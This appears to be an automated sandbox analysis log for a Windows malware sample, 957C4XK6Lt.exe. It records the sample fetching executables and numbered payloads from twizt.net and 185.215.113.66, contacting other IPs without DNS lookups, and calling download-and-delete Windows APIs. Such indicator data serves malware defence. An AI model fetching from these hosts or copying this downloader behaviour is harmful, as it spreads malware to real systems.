Source: global traffic HTTP traffic detected: GET /newtpp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: twizt.net
Source: global traffic HTTP traffic detected: GET /peinstall.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: twizt.net
Source: global traffic HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: unknown TCP traffic detected without corresponding DNS query: 134.35.81.188
Source: unknown TCP traffic detected without corresponding DNS query: 134.35.81.188
Source: unknown TCP traffic detected without corresponding DNS query: 134.35.81.188
Source: unknown TCP traffic detected without corresponding DNS query: 134.35.81.188
Source: unknown TCP traffic detected without corresponding DNS query: 134.35.81.188
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 109.72.204.86
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 109.72.204.86
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 109.72.204.86
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 109.72.204.86
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 109.72.204.86
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 213.230.90.222
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknown TCP traffic detected without corresponding DNS query: 213.230.90.222
Source: unknown TCP traffic detected without corresponding DNS query: 213.230.90.222
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.177
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.177
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.177
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.177
Source: unknown TCP traffic detected without corresponding DNS query: 213.230.90.222
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.177
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.177
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Code function: 0_2_00531080 GetTickCount,srand,ExpandEnvironmentStringsW,rand,rand,wsprintfW,InternetOpenW,InternetOpenUrlW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,Sleep,wsprintfW,DeleteFileW,Sleep,CloseHandle,InternetCloseHandle,InternetCloseHandle,Sleep,rand,rand,wsprintfW,URLDownloadToFileW,wsprintfW,DeleteFileW,Sleep, 0_2_00531080
Source: global traffic HTTP traffic detected: GET /newtpp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: twizt.net
Source: global traffic HTTP traffic detected: GET /peinstall.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: twizt.net
Source: global traffic HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic HTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: unknown DNS traffic detected: queries for: twizt.net
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:07:19 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:07:21 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:07:23 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:07:26 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:07:28 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data 